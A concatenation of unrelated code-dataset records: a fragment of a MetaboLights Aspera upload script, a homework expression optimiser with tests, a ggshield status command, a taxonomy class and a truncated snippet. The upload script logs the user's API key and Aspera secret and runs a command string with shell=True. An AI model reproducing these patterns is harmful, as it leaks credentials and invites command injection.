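The upload view above dispatches files through a long if/elif chain keyed on filename substrings. A hedged, table-driven sketch of the same routing, assuming Werkzeug-style upload objects with `.filename` and `.save()`; `route_uploads` and `KEYWORD_TO_SLOT` are illustrative names, not part of the app.

import os

KEYWORD_TO_SLOT = {
    'USPS': 'usps_file', 'HCDE': 'hcde_file', 'MISC': 'misc_file',
    'BuyBoard': 'buyboard_file', 'PCA': 'pca_file', 'Friendswood': 'friendswood_file',
}

def route_uploads(uploaded_files, upload_dir='uploads'):
    # Map each upload to its slot via the first keyword its name contains.
    slots = {slot: '' for slot in KEYWORD_TO_SLOT.values()}
    unknown = []
    for f in uploaded_files:
        if not f.filename:
            continue
        for keyword, slot in KEYWORD_TO_SLOT.items():
            if keyword in f.filename:
                path = os.path.join(upload_dir, f.filename)
                f.save(path)
                slots[slot] = path
                break
        else:  # no keyword matched
            unknown.append(f.filename)
    missing = [slot for slot, path in slots.items() if not path]
    return slots, unknown, missing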
., pathToFileN\n or\n --I pathToIsaTabfolder\n --v pathToValidationReportJSON\n\n -p MetaboLights Labs Project ID\n -n Create new project if project doesnt exist\n -s server [ \"prod\", \"dev\", \"test\" ]\n \"\"\"\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n usage=usage)\n parser.add_argument('-t', required=True, help='MetaboLights API Key')\n parser.add_argument('--i', required=False, nargs='+',\n help=\"Input folder(s)/file(s)\")\n parser.add_argument('--I', required=False,\n help=\"Input folder containing ISA-Tab, raw, and maf files\")\n parser.add_argument('--v', required=False,\n help=\"Validation report in JSON format\")\n parser.add_argument('-p', help='MetaboLights Labs Project ID')\n parser.add_argument('-n',\n help='Create new MetaboLights Labs Project if doesnt exist',\n action='store_true')\n parser.add_argument('-s', help='Server details. Allowed values are '.join(\n servers), choices=servers)\n args = parser.parse_args(arguments)\n # parser.print_help()\n logging.info(\"Validating Input Parameters\")\n # validating input\n if parseInput(args):\n # Input validation success\n logging.info(\"Input validation Success\")\n # Request MetaboLights Labs webservice for aspera upload configuration\n logging.info(\"Requesting project aspera upload configuration\")\n asperaConfiguration = requestUploadConfiguration()\n # logging.debug(\"(from Main) eval asperaConfiguration:\" + eval(asperaConfiguration) + asperaConfiguration +\" ??\")\n logging.info(\"Required project details obtained\")\n # Compile the aspera CLI command from the configuration\n logging.info(\"Compiling aspera command\")\n asperaCommand = compileAsperaCommand(asperaConfiguration)\n logging.info(\"asperaConfiguration: \" + asperaConfiguration[0] + asperaConfiguration[1] + asperaConfiguration[2] + asperaConfiguration[3] + asperaConfiguration[4] )\n logging.info(\"asperaConfiguration full: \" + asperaConfiguration)\n # logging.info(\"asperaConfiguration: \" + asperaConfiguration[\"content\"][\"asperaServer\"] )\n logging.info(\"Checking aspera Environment variables\")\n executeAsperaUpload(asperaCommand)\n else:\n logging.info(\"Input validation Failed: Terminating program\")\n print(\"Invalid Input: Please check the \" + log_file + \" for more details\")\n\n\ndef executeAsperaUpload(cmds):\n cmd = filter(None, cmds[1])\n print(\"CMD:\", cmds)\n cmd = filter(bool, cmd)\n # logging.info(\"CMD:\" , cmd)\n os.environ[\"ASPERA_SCP_PASS\"] = cmds[0]\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n out, err = p.communicate()\n logging.info(out)\n if err:\n logging.error(err)\n else:\n logging.info(\"Files uploaded successfully\")\n\n\ndef compileAsperaCommand(asperaConfiguration):\n\n logging.debug(\"this is asperaConfiguration (from compileAsperaCommand: \" + asperaConfiguration)\n try:\n # asperaConfiguration no longer a proper dictionary, just a regular string => need to convert back\n asperaConfiguration_asDict = ast.literal_eval(asperaConfiguration)\n # if isinstance(asperaConfiguration_asDict, dict):\n # for k, v in asperaConfiguration_asDict.items():\n # print(k, ' ', v)\n # else:\n # print(\"asperationConfiguration\", asperaConfiguration, \"is no dictionary!\")\n\n except IOError as e:\n print(e)\n\n filesLocation = (str(' '.join(str(e) for e in directories).strip() + \" \" + ' '.join(str(e) for e in files))).strip()\n remoteHost = asperaConfiguration_asDict['asperaUser'] + \"@\" + 
asperaConfiguration_asDict['asperaServer'] + \":/\" + env + \"/userSpace/\" + asperaConfiguration_asDict['asperaURL']\n # logging.debug(\"remoteHost = \" + remoteHost)\n logging.info(\"Project Location: \" + \"'/\" + env + \"/userSpace/\" + asperaConfiguration_asDict['asperaURL'] + \"'\")\n # asperaSecret = asperaConfiguration[\"asperaSecret\"]\n asperaSecret = asperaConfiguration_asDict['asperaSecret']\n # logging.info(\"aspera secret:\" + asperaConfiguration_asDict['asperaSecret'])\n return [asperaSecret, \"ascp -QT -P 33001 -L . -l 300M \" + filesLocation + \" \" + remoteHost]\n\n\ndef requestUploadConfiguration():\n # logging.basicConfig(file=sys.stderr, level=logging.DEBUG)\n # Requesting MetaboLightsLabs Webservice for the project configuration\n url = serverPortDictionary[env][\"server\"] \\\n + \"webservice/labs-workspace/asperaConfiguration\"\n payload = json.dumps({'api_token': api_token, 'project_id': project_id,\n 'new_project_flag': new_project_flag})\n headers = {'content-type': \"application/json\", 'cache-control': \"no-cache\"}\n # logging.debug(\"Here is the url: %s\", url)\n # logging.debug(\"Here is the payload: %s\", payload)\n # logging.debug(\"And, finally, the headers: %s\", headers)\n try:\n response = requests.request(\"POST\", url, data=str(payload),\n headers=headers)\n response.raise_for_status()\n except requests.HTTPError as e:\n logging.fatal(\"Request for upload configuration from MetaboLights server was unsuccessful\")\n logging.fatal(\"Server responded: %s\", response.text)\n logging.exception(e)\n sys.exit(1)\n except requests.exceptions.RequestException as e: # This is the correct syntax\n logging.error(e)\n print(\"Request failed! Refer to the log file for more details\")\n sys.exit(1)\n\n # logging.debug(\"response: %s\", response)\n # logging.debug(\"response.text: %s\", response.text)\n try:\n response_json = json.loads(response.text)['content']\n # logging.debug(\"response json: %s\", response_json)\n except ValueError as e:\n logging.error(e)\n print('Could not decode response from server!')\n sys.exit(1)\n return response_json\n\n\ndef parseInput(args):\n # Assigning the user api token to the global variable\n global api_token\n api_token = args.t\n logging.info('API Key:' + str(api_token))\n\n # Checking whether the input files and folders are valid and exist\n # Creating a array of files and folders that needs to be uploaded\n if args.i and not args.I:\n for entity in args.i:\n if os.path.isfile(entity):\n global files\n files.append(entity)\n logging.info(\n \"Adding \" + entity + \" to the files to be uploaded list\")\n if os.path.isdir(entity):\n global directories\n directories.append(entity)\n logging.info(\n \"Adding \" + entity + \" to the folders to be uploaded list\")\n elif args.I and not args.i:\n isatab_folder = args.I\n if args.v:\n with open(args.v) as fp:\n validation_report = json.load(fp)\n if validation_report['errors']:\n logging.info(\n \"Validation report supplied has {num_errors} errors, cancelling upload\".format(\n num_errors=len(validation_report['errors'])))\n return False\n else:\n logging.info(\"Validation report supplied has no errors\")\n logging.info(\n \"Validation report supplied has {num_warnings} warnings. 
You may wish to check and address these errors before finalizing your submission to MetaboLights\".format(\n num_warnings=len(validation_report['warnings'])))\n global tmpdir\n tmpdir = tempfile.mkdtemp()\n if os.path.isdir(isatab_folder):\n isazip_path = os.path.join(tmpdir, \"isa.zip\")\n with zipfile.ZipFile(isazip_path, \"w\") as zip:\n for isa_file in glob.glob(\n \"{}/[isa]*.txt\".format(isatab_folder)):\n zip.write(isa_file)\n files.append(isazip_path)\n mafzip_path = os.path.join(tmpdir, \"maf.zip\")\n with zipfile.ZipFile(mafzip_path, \"w\") as zip:\n for maf_file in glob.glob(\"{}/m_*.tsv\".format(isatab_folder)):\n zip.write(maf_file)\n files.append(mafzip_path)\n raw_data_types = (\"*.mzml\", \"*.mzML\", \"*.nmrml\", \"*.nmrML\")\n datazip_path = os.path.join(tmpdir, \"data.zip\")\n with zipfile.ZipFile(datazip_path, \"w\") as zip:\n data_files = []\n for file_type in raw_data_types:\n data_files.extend(\n glob.glob(os.path.join(tmpdir, file_type)))\n for data_file in data_files:\n zip.write(data_file)\n files.append(datazip_path)\n else:\n logging.warning(\"No input folder or files provided\")\n return False\n\n # Assigning env to the global variable\n global env\n env = args.s\n logging.info(\"Setting env flag: \" + str(env))\n\n # Assigning create new flag to the global variable\n global new_project_flag\n new_project_flag = str(args.n).lower()\n logging.info(\"Create new project flag provided: \" + str(new_project_flag))\n\n # Assigning ML project id to the global variable\n global project_id\n # If create new project flag is not set, making sure the project id exist\n if not new_project_flag:\n project_id = args.p\n logging.warning(\"Project_id assigned: \" + str(project_id))\n if not project_id:\n logging.warning(\n \"Project_ID not assigned. 
Please provide -n flag if you would like to create a new project\")\n return False\n else:\n project_id = args.p\n logging.info(\"Project_id assigned @Input : \" + str(project_id))\n\n # Checking if no files or folders exist\n if (len(files) == 0 and len(directories) == 0):\n logging.warning(\"No valid files or directories provided\")\n return False\n return True\n\n\nif __name__ == '__main__':\n try:\n sys.exit(main(sys.argv[1:]))\n finally:\n if tmpdir != '':\n shutil.rmtree(tmpdir)\n","repo_name":"ISA-tools/isatools-galaxy","sub_path":"tools/mtbls/uploadToMetaboLightsLabs.py","file_name":"uploadToMetaboLightsLabs.py","file_ext":"py","file_size_in_byte":12636,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"70644446521","text":"#!/usr/bin/env python3\nfrom calcs import Calculator, Token, tokenize, represent_as_tree, to_postfix\nfrom string import ascii_lowercase\nimport copy\n\n\ndef merge_tokens(*args, integer_devision=False):\n new_token = Token('')\n new_token.pos = min([t.pos for t in args])\n new_token.end_pos = max([t.pos for t in args])\n new_token.priority = 0\n\n ch_queue = [t.ch for t in args if t.priority == 0]\n sign_queue = [t.ch for t in args if t.priority != 0]\n priority = max(args[0].priority, args[1].priority)\n merged_len = len(ch_queue)\n\n if str(args[0].ch) in '+*':\n # remove unary plus or mul\n sign_queue.pop(0)\n\n # Not power sign\n if priority < 3:\n new_val = int(ch_queue.pop(0))\n for i in range(len(ch_queue)):\n val = int(ch_queue.pop(0))\n sign = sign_queue.pop(0)\n if sign == '+':\n new_val += val\n elif sign == '-':\n new_val -= val\n elif sign == '*':\n new_val *= val\n elif sign == '/':\n new_val /= val\n if integer_devision:\n new_val = round(new_val)\n else:\n new_val = ch_queue.pop(-1)\n for i in range(len(ch_queue)):\n new_val = ch_queue.pop(-1) ** new_val\n\n new_token.ch = str(new_val)\n new_token.merged_len = merged_len\n if new_val < 0:\n sign = copy.copy(new_token)\n sign.ch = '-'\n new_token.ch = new_token.ch[1::]\n return [sign, new_token]\n return [new_token]\n\n\ndef simplify_with_var(node):\n pos = node[0].pos\n end_pos = node[-1].pos\n digits = [i.ch for i in node if str(i.ch).isdigit()]\n if len(node) > 4 and len(digits) > 1:\n calculable = []\n incalculable = []\n tokens = node.copy()\n first_var = []\n prev_token = None\n if tokens[0].ch in set(ascii_lowercase):\n first_var.append(tokens.pop(0))\n prev_token = first_var[0]\n for token in tokens:\n if token.ch in set(ascii_lowercase):\n incalculable.append(prev_token)\n incalculable.append(token)\n elif str(token.ch).isdigit():\n if prev_token:\n calculable.append(prev_token)\n calculable.append(token)\n prev_token = token\n incalculable = first_var + incalculable\n calculable = merge_tokens(*calculable, integer_devision=True)\n if incalculable[0].ch in set(ascii_lowercase):\n if int(calculable[0].ch) < 0:\n result = incalculable + tokenize('-') + calculable\n else:\n result = incalculable + tokenize('+') + calculable\n else:\n result = calculable + incalculable\n else:\n result = node\n result[0].pos = pos\n result[0].end_pos = end_pos\n return result\n\n\ndef merge(s1, operator, s2):\n s1, s2 = int(s1), int(s2)\n if operator == '+':\n return str(s1 + s2)\n elif operator == '-':\n return str(s1 - s2)\n elif operator == '*':\n return str(s1 * s2)\n elif operator == '/':\n return str(int(s1 / s2))\n elif operator == '^':\n return str(s1 ** s2)\n\n\nclass AbstractOptimiser:\n def process(self, graph):\n g = 
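executeAsperaUpload above hands a filter object to Popen with shell=True, which fails under Python 3 and is fragile with user-supplied paths. A minimal sketch of the same invocation with an argument list, reusing the ascp flags from compileAsperaCommand; `run_ascp` is an illustrative name, not the script's API.

import os
import subprocess

def run_ascp(secret, sources, remote, rate='300M', port='33001'):
    # ascp reads the transfer password from this environment variable.
    env = dict(os.environ, ASPERA_SCP_PASS=secret)
    argv = ['ascp', '-QT', '-P', port, '-L', '.', '-l', rate, *sources, remote]
    completed = subprocess.run(argv, env=env, capture_output=True, text=True)
    if completed.returncode != 0:
        raise RuntimeError(completed.stderr)
    return completed.stdout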
self.pre_process(graph)\n\n result = self.process_internal(g)\n\n return self.post_process(result)\n\n def pre_process(self, graph):\n return tokenize(graph)\n\n def process_internal(self, graph):\n return graph\n\n def post_process(self, result):\n return result\n\n\nclass DoubleNegativeOptimiser(AbstractOptimiser):\n # -(-a) -> a\n\n def process_internal(self, graph):\n chars = [str(t.ch) for t in graph]\n def select_brackets(str_repr: str):\n inner = ''\n processed = ''\n sign_queue = ['+']\n ctr = None\n while True:\n try:\n sym, str_repr = str_repr[0], str_repr[1::]\n if sym in '+-*/^' and ctr is None:\n sign_queue.append(sym)\n elif sym == '(' and ctr is None:\n ctr = 1\n elif sym == '(':\n ctr += 1\n elif sym == ')':\n ctr -= 1\n \n if ctr is not None and ctr == 0:\n break\n if ctr is not None and ctr > 0:\n inner += sym\n except IndexError:\n return processed, '', processed, str_repr\n processed += sym\n inner = inner[1::]\n return processed, sign_queue[-1], inner, str_repr\n\n def remove_dbl_neg(str_repr):\n processed, sign, inner, cut_str = select_brackets(str_repr)\n plus = ''\n left = processed.replace('{}({}'.format(sign, inner), '', 1)\n if left:\n left += '+'\n plus = '+'\n tokens = tokenize(inner)\n if sign == '-' and inner.startswith('-(') and inner.endswith(')'):\n str_repr = left + inner[2:len(inner) - 1] + cut_str\n elif len(tokens) == 2 and tokens[0].ch == '-':\n str_repr = str_repr.replace('-({})'.format(inner), plus + inner[1], 1) \n elif '(' not in inner:\n # sqr brackets added to avoid processing same brackets twice\n str_repr = str_repr.replace('(', '[', 1).replace(')', ']', 1)\n return str_repr\n\n str_repr = ''.join(chars)\n if '(' not in str_repr:\n # nothing to simplify\n return chars\n\n while True:\n new_repr = remove_dbl_neg(str_repr)\n if new_repr == str_repr:\n break\n str_repr = new_repr\n \n # remove sqr brackets and fix signs \n str_repr = str_repr.replace('[', '(').replace(']', ')').replace('+-', '-')\n new_opcodes = list(str_repr)\n return new_opcodes\n\n\nclass IntegerCostantsOptimiser(AbstractOptimiser):\n # a + 4*2 -> a + 8\n def process_internal(self, graph):\n if len(graph) < 3:\n return graph\n tree = represent_as_tree(graph)\n priority_lst = sorted(tree.keys(), reverse=True)\n prev_key = None\n higher_nodes = {}\n for key in priority_lst:\n branch = tree[key]\n for node in branch:\n if not prev_key:\n # if there is no nodes with higher priority\n # check if there is variable in this node\n if [t.ch for t in node if t.ch in set(ascii_lowercase)]:\n # put variables to the start or to the end of node,\n # and calculate the rest\n result = simplify_with_var(node)\n result[0].calculable = False\n else:\n # if no variable calculate the node\n result = merge_tokens(*node, integer_devision=True)\n result[0].calculable = True\n pos, end_pos = result[0].pos, result[0].end_pos\n higher_nodes[(pos, end_pos)] = result\n else:\n tokens = node.copy()\n node_pos = tokens[0].pos\n node_end_pos = tokens[-1].pos\n result = []\n left_side = []\n left_sign = []\n right_side = []\n right_sign = []\n used = []\n for limits in higher_nodes.keys():\n pos, end_pos = limits\n if node_end_pos <= pos:\n tokens.pop(-1) # remove outdated tokens\n right_sign = [tokens.pop(-1)]\n right_side = higher_nodes[limits]\n used.append(limits)\n\n if node_pos >= end_pos:\n tokens.pop(0) # remove outdated tokens\n left_sign = [tokens.pop(0)]\n left_side = higher_nodes[limits]\n used.append(limits)\n for l in used:\n del higher_nodes[l]\n\n if not [t.ch for t in tokens if\n t.ch in 
set(ascii_lowercase)]:\n if left_side and not [t.ch for t in left_side if\n t.ch in set(ascii_lowercase)]:\n # in left side doesn't contain variables\n new_exp = left_side + left_sign + tokens\n tokens = merge_tokens(*new_exp,\n integer_devision=True)\n left_side, left_sign = [], []\n if right_side and not [t.ch for t in right_side if t.ch\n in set(ascii_lowercase)]:\n new_exp = tokens + right_sign + right_side\n tokens = merge_tokens(*new_exp,\n integer_devision=True)\n right_side, right_sign = [], []\n result += left_side + left_sign + tokens + right_sign + right_side\n pos = result[0].pos\n\n # calculate result\n priorities = len({i.priority for i in result})\n if priorities < 3:\n # if all signs have same priority P, for variables\n # P = 0 by default\n result = simplify_with_var(result)\n\n # expanding new node limits\n try:\n end_pos = result[-1].end_pos\n except AttributeError:\n end_pos = result[-1].pos\n higher_nodes[(pos, end_pos)] = result\n prev_key = key\n\n return result\n\n def post_process(self, result):\n new_opcodes = [str(i.ch) for i in result]\n return new_opcodes\n\n\nclass SimplifierOptimiser(AbstractOptimiser):\n # a * 0 -> 0\n # a + 0 -> 0\n # * a or True -> True\n # * a and False -> False\n def process_internal(self, graph):\n def simplify_sum(node):\n variable_ctrs = {}\n order = []\n for t in node:\n if t.ch in set(ascii_lowercase) or str(t.ch).isdigit():\n if t.ch not in variable_ctrs.keys():\n order.append(str(t.ch))\n variable_ctrs[str(t.ch)] = 0\n if node[0].ch != '-':\n node = tokenize('+') + node\n for i in range(0, len(node), 2):\n sign = node[i].ch\n var = str(node[i + 1].ch)\n if sign == '-':\n variable_ctrs[var] -= 1\n else:\n variable_ctrs[var] += 1\n\n new_node = []\n for var in order:\n ctr = variable_ctrs[var]\n if ctr < 0:\n ctr = [str(ctr)[1::]]\n if ctr == ['1']:\n ctr = []\n else:\n ctr += ['*']\n new_node += ['-'] + ctr + [var]\n elif ctr > 0:\n ctr = [str(ctr)]\n if ctr == ['1']:\n ctr = ['+']\n else:\n ctr = ['+'] + ctr + ['*']\n new_node += ctr + [var]\n else:\n pass\n if len(new_node) == 0:\n return tokenize('0')\n new_node = tokenize(new_node)\n return new_node\n\n def simplify_division(node):\n variable_ctrs = {}\n order = []\n for t in node:\n if t.ch in set(ascii_lowercase) or str(t.ch).isdigit():\n if t.ch not in variable_ctrs.keys():\n order.append(str(t.ch))\n variable_ctrs[str(t.ch)] = 0\n if node[0].ch in set(ascii_lowercase):\n node = tokenize('*') + node\n for i in range(0, len(node), 2):\n sign = node[i].ch\n var = str(node[i + 1].ch)\n if sign == '/':\n variable_ctrs[var] -= 1\n else:\n variable_ctrs[var] += 1\n new_node = []\n for var in order:\n if str(var) != '1':\n ctr = variable_ctrs[var]\n if ctr < 0:\n new_node += ['/', var] * abs(ctr)\n elif ctr > 0:\n new_node += ['*', var] * ctr\n else:\n pass\n if len(new_node) == 0:\n return tokenize('1')\n if new_node[0] == '/':\n new_node = ['1'] + new_node\n elif new_node[0] == '*':\n new_node = new_node[1::]\n new_node = tokenize(new_node)\n return new_node\n\n def mul_by_zero(node):\n for i in range(len(node) - 1):\n ch_1, ch_2 = node[i].ch, node[i + 1].ch\n if str(ch_1) == '0' and str(ch_2) == '*':\n new_node = ['0']\n elif str(ch_1) == '*' and str(ch_2) == '0':\n new_node = ['0']\n else:\n new_node = [str(t.ch) for t in node]\n new_node = tokenize(new_node)\n return new_node\n\n def add_zero(node):\n if len(node) < 2:\n return node\n else:\n if node[0].priority == 0:\n node = tokenize('+') + node\n new_node = []\n for i in range(0, len(node) - 1, 2):\n ch_1, ch_2 = 
node[i].ch, node[i + 1].ch\n if str(ch_2) != '0':\n new_node.append(str(ch_1))\n new_node.append(str(ch_2))\n new_node = tokenize(new_node)\n return new_node\n\n def to_zero_pwr(node):\n zero_pwr = 0\n new_node = []\n for token in node[::-1]:\n if str(token.ch) == '0':\n zero_pwr = 2\n elif zero_pwr == 2:\n zero_pwr -= 1\n elif zero_pwr == 1:\n zero_pwr -= 1\n new_node += tokenize('1')\n else:\n new_node.append(token)\n zero_pwr = False\n return new_node[::-1]\n\n def simplify(node):\n priority_set = {t.priority for t in node if t.priority != 0}\n priority = min(priority_set)\n if priority == 3:\n node = to_zero_pwr(node)\n elif priority == 2:\n node = mul_by_zero(node)\n if len(node) > 2:\n node = simplify_division(node)\n elif priority == 1:\n if len(priority_set) == 1:\n node = simplify_sum(node)\n node = add_zero(node)\n return node\n\n tree = represent_as_tree(graph)\n priority_lst = sorted(tree.keys(), reverse=True)\n prev_key = None\n higher_nodes = {}\n result = graph\n for key in priority_lst:\n branch = tree[key]\n for node in branch:\n if not prev_key:\n # if there is no nodes with higher priority\n # check if there is variable in this node\n pos, end_pos = node[0].pos, node[-1].pos\n result = simplify(node)\n higher_nodes[(pos, end_pos)] = result\n else:\n tokens = node.copy()\n node_pos = tokens[0].pos\n node_end_pos = tokens[-1].pos\n result = []\n left_side = []\n left_sign = []\n right_side = []\n right_sign = []\n used = []\n for limits in higher_nodes.keys():\n pos, end_pos = limits\n if node_end_pos <= pos:\n tokens.pop(-1) # remove outdated tokens\n right_sign = [tokens.pop(-1)]\n right_side = higher_nodes[limits]\n used.append(limits)\n\n if node_pos >= end_pos:\n tokens.pop(0) # remove outdated tokens\n left_sign = [tokens.pop(0)]\n left_side = higher_nodes[limits]\n used.append(limits)\n for l in used:\n del higher_nodes[l]\n\n if left_side:\n # in left side doesn't contain variables\n new_exp = left_side + left_sign + tokens\n try:\n tokens = merge_tokens(*new_exp)\n except Exception as e:\n tokens = simplify(new_exp)\n left_side, left_sign = [], []\n if right_side:\n new_exp = tokens + right_sign + right_side\n try:\n tokens = merge_tokens(*new_exp)\n except Exception as e:\n tokens = simplify(new_exp)\n right_side, right_sign = [], []\n\n result += left_side + left_sign + tokens + right_sign + right_side\n\n pos = result[0].pos\n\n # expanding new node limits\n try:\n end_pos = result[-1].end_pos\n except AttributeError:\n end_pos = result[-1].pos\n higher_nodes[(pos, end_pos)] = result\n prev_key = key\n\n # return graph\n return result\n\n def post_process(self, result):\n new_opcodes = [str(i.ch) for i in result]\n return new_opcodes\n\n\ndef test_double_negetive():\n double_negate_tests = [\n ('-(-a)', 'a'),\n ('-(-5)', '5'),\n ('-(a+b)+c-(-d)', 'ab+-c+d+'),\n ]\n\n for case, exp in double_negate_tests:\n tokens = list(case)\n calc = Calculator(tokens, [DoubleNegativeOptimiser()])\n calc.optimise()\n\n if str(calc) != exp:\n print('Error in case for \"{}\". Actual \"{}\", expected {}'\n .format(case, calc, exp))\n\n\ndef test_integer_constant_optimiser():\n # test cases помеченные (*) не обязательны к прохождению. 
\n integer_constant_optimiser_tests = [\n (['1'], ['1']),\n (['1', '+', '2'], ['3']),\n (['1', '-', '2'], ['1-']),\n (['2', '*', '2'], ['4']),\n (['2', '/', '2'], ['1']),\n (['2', '^', '10'], ['1024']),\n (['a', '+', '2', '*', '4'], ['a8+', '8a+']),\n\n (['2', '+', 'a', '+', '3'], ['5a+', 'a5+']), # (*)\n ]\n\n for case, exp in integer_constant_optimiser_tests:\n calc = Calculator(case, [DoubleNegativeOptimiser(),\n IntegerCostantsOptimiser()])\n\n calc.optimise()\n\n if str(calc) not in exp:\n print('Error in case for \"{}\". Actual \"{}\", expected {}'\n .format(case, calc, exp))\n\n\ndef test_simplifier_optimiser():\n # test cases помеченные (*) не обязательны к прохождению. \n simplifier_optimiser_test = [\n ('a+0', ['a']),\n ('a*1', ['a']),\n ('a*0', ['0']),\n ('b/b', ['1']),\n ('a-a', ['0']),\n ('a+(b-b)', ['a']),\n ('a+(7-6-1)', ['a']),\n ('a^0', ['1']),\n ('a-(-(-a))', ['0']),# ???\n\n ('a+a+a', ['a3*', '3a*']), # (*)\n # ('(a-b)-(a-b)', ['0']), # (*)\n # ('(a-b)/(a-b)', ['1']), # (*)\n # ('(a+b)+(a+b)', ['ab+2*', '2ab+*']), # (*)\n # ('a*b+a*b', ['2ab**', '2ba**', 'a2b**', 'ab2**', 'b2a**', 'ba2**']),\n # (*)\n ]\n\n for case, exps in simplifier_optimiser_test:\n tokens = list(case)\n calc = Calculator(tokens, [DoubleNegativeOptimiser(),\n IntegerCostantsOptimiser(),\n SimplifierOptimiser()])\n\n calc.optimise()\n\n if str(calc) not in exps:\n print('Error in case for \"{}\". Actual \"{}\", expected {}'\n .format(case, calc, exps))\n\n# test_double_negetive()\n# test_integer_constant_optimiser()\n# test_simplifier_optimiser()\n\ndef valid_integer_constant_optimiser_test():\n integer_constant_optimiser_tests = [\n (['1'], ['1']),\n (['1', '+', '2'], ['3']),\n (['1', '-', '2'], ['1-']),\n (['2', '*', '2'], ['4']),\n (['2', '/', '2'], ['1']),\n (['2', '^', '10'], ['1024']),\n (['a', '+', '2', '*', '4'], ['a8+', '8a+']),\n\n (['2', '+', 'a', '+', '3'], ['5a+', 'a5+']), # (*)\n (list('-(-a)'), ['a']),\n (list('-(-(-(-a)))'), ['a']),\n (list('-(-5)'), ['5']),\n (list('-(a+b)+c-(-d)'), ['a-b+c+d+']),\n (list('-(-(a+b))'), ['ab+'])\n ]\n\n for case, exp in integer_constant_optimiser_tests:\n calc = Calculator(case, [DoubleNegativeOptimiser(), IntegerCostantsOptimiser()])\n\n try:\n if calc.validate():\n calc.optimise()\n\n strcase = ''.join(case)\n print(str(calc))\n res_bool = str(calc) in exp\n res_str = 'True' if res_bool else 'False'\n \n print(strcase + ' | ' + str(res_bool) + ' | ' + res_str)\n else:\n print('{} is not valid'.format(case))\n except Exception as e:\n raise e\n print(strcase, 'executed with exception')\n\n# valid_integer_constant_optimiser_test()\n\n# calc = Calculator('-(-(a+b))', [DoubleNegativeOptimiser()])\n# calc = Calculator('a-(-(-a))', [DoubleNegativeOptimiser(), IntegerCostantsOptimiser(), SimplifierOptimiser()])\n# calc.validate()\n# calc.optimise()\n# print(calc)","repo_name":"EgorOs/osinkin_hw6","sub_path":"optimisers.py","file_name":"optimisers.py","file_ext":"py","file_size_in_byte":22550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71069740281","text":"import logging\nfrom typing import Any\n\nimport click\n\nfrom ggshield.cmd.utils.common_options import add_common_options\nfrom ggshield.core.config import Config\nfrom ggshield.core.text_utils import STYLE, format_text\nfrom ggshield.verticals.hmsl import get_client\n\n\nlogger = logging.getLogger(__name__)\n\n\n@click.command()\n@click.pass_context\n@add_common_options()\ndef status_cmd(\n ctx: click.Context,\n **kwargs: Any,\n) -> 
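The optimiser classes above fold integer constants by repeatedly merging token pairs. For contrast, a compact sketch of the same folding done in one pass over a postfix token stream (the notation the Calculator tests print), keeping merge()'s integer-division semantics; `fold_postfix` is an illustrative name and it leaves variable subtrees as nested tuples rather than re-tokenizing them.

def fold_postfix(tokens):
    ops = {'+': lambda a, b: a + b, '-': lambda a, b: a - b,
           '*': lambda a, b: a * b, '/': lambda a, b: int(a / b),
           '^': lambda a, b: a ** b}
    stack = []
    for t in tokens:
        if t in ops:
            b, a = stack.pop(), stack.pop()
            if isinstance(a, int) and isinstance(b, int):
                stack.append(ops[t](a, b))  # both operands known: fold now
            else:
                stack.append((a, t, b))     # a variable is involved: keep symbolic
        else:
            stack.append(int(t) if t.isdigit() else t)
    return stack.pop()

# fold_postfix(['1', '2', '+']) -> 3
# fold_postfix(['1', '2', '+', 'a', '*']) -> (3, '*', 'a')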
int:\n \"\"\"\n Make sure the HasMySecretLeaked service is working properly.\n \"\"\"\n\n # Get our client\n config: Config = ctx.obj[\"config\"]\n client = get_client(config, ctx.command_path)\n\n click.echo(\n f\"{format_text('API URL:', STYLE['key'])} {client.url}\\n\"\n f\"{format_text('Authenticated:', STYLE['key'])} {str(client.jwt is not None).lower()}\\n\"\n f\"{format_text('Status:', STYLE['key'])} {format_status(client.status)}\\n\"\n )\n\n return 0\n\n\ndef format_status(health_check: bool) -> str:\n (color, status) = (\"green\", \"healthy\") if health_check else (\"red\", \"unhealthy\")\n return format_text(status, {\"fg\": color})\n","repo_name":"GitGuardian/ggshield","sub_path":"ggshield/cmd/hmsl/api_status.py","file_name":"api_status.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":1431,"dataset":"github-code","pt":"40"} +{"seq_id":"41707108701","text":"'''\nCreated on Aug 29, 2011\n@author: Serena\n'''\n\nclass NoLineage(object):\n def get_taxon(self, rank):\n return None\n\n\nclass Lineage(object):\n ranks = [\n \"superkingdom\", \"kingdom\", \"phylum\", \"class\",\n \"order\", \"family\", \"genus\", \"species\"\n ]\n standard_rank_idx = dict(\n (rank, idx) for idx, rank in enumerate(ranks))\n\n def __init__(self, taxa):\n # Internally, taxa are stored using an integer to represent\n # the rank. This helps when comparing ranks to see which is\n # higher or lower\n self._taxa = [\n (name, self.standard_rank_idx.get(rank)) for name, rank in taxa]\n\n def get_taxon(self, rank):\n rank_idx = self.ranks.index(rank)\n for name, idx in self._taxa:\n if idx is None:\n continue\n elif idx == rank_idx:\n return name\n elif idx > rank_idx:\n return \"{0} ({1})\".format(name, rank)\n return None\n\n def get_standard_taxa(self, rank):\n rank_idx = self.ranks.index(rank)\n slice_idx = rank_idx + 1\n ranks_up_to = self.ranks[:slice_idx]\n for r in ranks_up_to:\n yield self.get_taxon(r)\n\n @staticmethod\n def is_generic_name(name):\n return (name == \"environmental samples\") or \\\n name.startswith(\"unclassified\")\n\n def is_generic(self, rank):\n rank_idx = self.ranks.index(rank)\n last_idx = 0\n for name, idx in self._taxa:\n if idx is None:\n if self.is_generic_name(name):\n if last_idx < rank_idx:\n return True\n else:\n if idx >= rank_idx:\n return False\n last_idx = idx\n return False\n","repo_name":"kylebittinger/brocc","sub_path":"brocclib/taxonomy.py","file_name":"taxonomy.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"21786173662","text":"L = [8, 24, 27, 48, 2,16, 9, 102, 7, 84, 91]\r\n\r\ndef max_min(L):\r\n max = L[0]\r\n min = L[0]\r\n for i in range(len(L)):\r\n if L[i] > max:\r\n max = L[i]\r\n if L[i] < min:\r\n min = 